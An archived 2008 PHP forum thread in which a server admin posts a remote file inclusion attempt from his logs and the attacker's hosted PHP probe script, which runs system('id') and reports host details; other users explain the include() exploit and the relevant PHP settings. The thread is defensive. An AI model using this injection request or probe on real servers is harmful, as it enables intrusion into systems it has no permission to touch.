php_dunce Posted October 11, 2008 Share Posted October 11, 2008 Can any php person help me out here please I run several flash servers and recently have noticed a strange error entry in my logs. The error is as follows:- GET /red5/guestbook/index.php%20//?include_path=http://******.com/v6id.txt??? HTTP/1.1 with response code(s) 404 2 responses (i have hidden the actual url) I have examined the .txt page this person is trying to include and it contains the following php code, So can someone here tell me what this is please contents of .txt page :- function ConvertBytes($number) { $len = strlen($number); if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); } return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "PPPoE<br>"; $un = @php_uname(); $id1 = system(id); $pwd1 = @getcwd(); $free1= diskfreespace($pwd1); $free = ConvertBytes(diskfreespace($pwd1)); if (!$free) { $free = 0; } $all1= disk_total_space($pwd1); $all = ConvertBytes(disk_total_space($pwd1)); if (!$all) { $all = 0; } $used = ConvertBytes($all1-$free1); $os = @PHP_OS; echo "PPPoE was here ..<br>"; echo "uname -a: $un<br>"; echo "os: $os<br>"; echo "id: $id1<br>"; echo "free: $free<br>"; echo "used: $used<br>"; echo "total: $all<br>"; exit; Link to comment https://forums.phpfreaks.com/topic/128007-error-log/ Share on other sites More sharing options...
Prismatic Posted October 11, 2008 Share Posted October 11, 2008 Looks to me like someone tried to inject some PHP into your guestbook Link to comment https://forums.phpfreaks.com/topic/128007-error-log/#findComment-662837 Share on other sites More sharing options...
PFMaBiSmAd Posted October 11, 2008 Share Posted October 11, 2008 This is attempting to inject raw php code into an include (or include_once/require/require_once) statement on your server and have it executed. It does this by placing the URL of the raw php code onto the end of your URL either in the hope that your script is using a GET parameter in an include() statement without validating what is being received or because it knows that your script is using a GET parameter in an include() statement (some of the poorly written open source scripts do not validate what is being received, such as guest books, and contain this code injection exploit.) The posted code is only getting and outputting some information, probably just as a probing attempt to find servers and scripts that can be exploited. However, if your server and script allows this external raw php code to be executed, then the next step is to inject ANY code the hacker wishes to run on your server. This can result in your site being replaced or Trojan scripts being placed on your server that can be used for doing things like sending spam through your mail server. For this exploit to work, in addition to the script that is putting GET parameters into include statements without validating it first, your php installation must have the allow_url_fopen setting ON (php4) or it must have the allow_url_include setting on (php5). Link to comment https://forums.phpfreaks.com/topic/128007-error-log/#findComment-662845 Share on other sites More sharing options...
php_dunce Posted October 11, 2008 Author Share Posted October 11, 2008 thanks guys i suspected it was no i dont have allow_url_fopen setting ON and have blocked the Ip address concerned Link to comment https://forums.phpfreaks.com/topic/128007-error-log/#findComment-662864 Share on other sites More sharing options...
waynew Posted October 11, 2008 Share Posted October 11, 2008 echo "PPPoE<br>"; When I meet this haxor, I'm going to scold him for not using valid XHTML. Link to comment https://forums.phpfreaks.com/topic/128007-error-log/#findComment-662866 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.